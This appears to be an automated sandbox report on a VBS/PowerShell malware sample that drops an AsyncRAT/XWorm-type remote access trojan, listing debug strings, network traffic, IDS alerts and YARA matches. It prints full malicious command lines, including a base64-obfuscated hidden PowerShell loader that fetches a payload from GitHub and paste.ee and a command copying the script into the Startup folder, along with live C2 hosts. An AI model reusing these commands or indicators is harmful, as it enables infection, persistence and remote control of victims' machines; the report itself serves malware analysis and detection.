            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.0000000001139000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.1685514693.00007FFB4B040000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.pdbMZ source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: System.Xml.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: System.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: %%.pdb source: MSBuild.exe, 0000000C.00000002.2607292773.000000000605B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Core.ni.pdbRSDS source: WERB0BF.tmp.dmp.22.dr
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.iniJump to behavior

            Software Vulnerabilities

            barindex
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49725 -> 93.123.39.76:20506
            Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.8:49709 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 188.114.97.3:443 -> 192.168.2.8:49709
            Source: Malware configuration extractorURLs: futurist2.ddns.net
            Source: unknownDNS query: name: paste.ee
            Source: unknownDNS query: name: futurist2.ddns.net
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: Yara matchFile source: 9.2.powershell.exe.1ffe69692d0.0.raw.unpack, type: UNPACKEDPE
            Source: global trafficTCP traffic: 192.168.2.8:49710 -> 93.123.39.76:20506
            Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/nyV34/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
            Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49712 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/nyV34/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
            Source: global trafficDNS traffic detected: DNS query: paste.ee
            Source: global trafficDNS traffic detected: DNS query: futurist2.ddns.net
            Source: powershell.exe, 00000009.00000002.1647885740.000001FFF6492000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE7EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE684E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE7D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE7B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
            Source: powershell.exe, 00000005.00000002.1547296706.0000024B8009C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1690290292.0000024134B13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE6421000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2589539147.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE7B63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE7D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000005.00000002.1547296706.0000024B8001B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
            Source: powershell.exe, 00000005.00000002.1547296706.0000024B80069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1690290292.0000024134B4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1690290292.0000024134B3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE6421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE7EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE7EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE7EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE7D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE7361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000009.00000002.1647885740.000001FFF6492000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE7EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE7B63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE7B63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE684E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE684E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/nyV34/0
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE7B14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE6643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE7361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE6643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE7361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE6643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtd0m;
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
            Source: powershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49709 version: TLS 1.2

            System Summary

            barindex
            Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 9.2.powershell.exe.1ffe69692d0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 9.2.powershell.exe.1ffe69692d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000C.00000002.2579124201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000009.00000002.1617406175.000001FFE6961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7208, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7600, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')Jump to behavior
